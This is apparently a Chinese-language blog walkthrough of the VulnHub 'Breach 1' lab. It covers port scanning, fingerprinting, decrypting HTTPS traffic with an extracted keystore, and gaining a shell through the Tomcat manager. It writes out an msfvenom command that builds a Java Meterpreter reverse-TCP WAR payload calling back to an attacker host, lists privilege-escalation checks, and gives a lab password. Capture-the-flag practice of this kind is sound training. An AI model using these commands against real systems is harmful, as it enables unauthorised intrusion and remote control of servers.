反弹连接vulnhub靶场breach1

  • Post author:
  • Post category:其他




靶场环境

https://www.vulnhub.com/



配置靶机网络

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述



工具准备

准备一个kali

在这里插入图片描述
burpsuite

wireshark

CTF编码工具

kali反弹 192.168.110.128

breach1 192.168.110.140

kali攻击 192.168.202.129

在这里插入图片描述



端口扫描信息收集

nmap -T4 -A -v 192.168.110.140

在这里插入图片描述
在这里插入图片描述
得到这么多端口,猜测可能是添加了一些安全产品

思路:按照常用的端口为80,打开网站看看

在这里插入图片描述

思路:翻译看看

在这里插入图片描述

思路:保存图片到本地,打开stu.baidu.com查看这张图的来源

在这里插入图片描述

在这里插入图片描述
思路:查看一下源码

在这里插入图片描述

思路:想想编码的特征

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
思路:猜测这个很可能是用户名和密码

看到鼠标一接近那个图片就会变成手的形状,可以点点看

在这里插入图片描述

在这里插入图片描述

思路:使用目录扫描dirb

在这里插入图片描述
没有什么发现



指纹识别

  • Wappalyzer安装插件

    在这里插入图片描述

    在这里插入图片描述
  • whatweb

在这里插入图片描述

  • msf

在这里插入图片描述

在这里插入图片描述
全部尝试一下,发现都不成功



CMS后台信息收集

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

这是一个密钥库的文件

在这里插入图片描述



解密HTTPS流量

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
HTTP的端口为8443

在这里插入图片描述

在这里插入图片描述

补充:使用keytool.exe生成一个密钥库

在这里插入图片描述
查看密钥库的内容

在这里插入图片描述
生成证书

在这里插入图片描述

提取证书

keytool -importkeystore -srckeystore D:\vulnhub\2-breach1\keystore -destkeystore D:\vulnhub\2-breach1\tomcat.p12 -deststoretype PKCS12 -srcalias tomcat

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

新版本为TLS

在这里插入图片描述

在这里插入图片描述

过滤查看一下数据包

ip.src ==192.168.110.140 || ip.dst == 192.168.110.140 and http

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

获取的证书是不安全,服务器不接受

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述



Tomcat后台利用

利用Kali-129生成木马

在这里插入图片描述

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.128 lport=4444 -f war -o kali.war

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

点击/kali

迅速放包

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述



Linux提权

在这里插入图片描述

1,搜索漏洞

2,find ; ls -a

3,history

4,sudo -l

5,uname -a

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
没有什么,乖乖的从头开始

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

尝试登录

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

密码为coffeestains

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述



版权声明:本文为m0_57379855原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。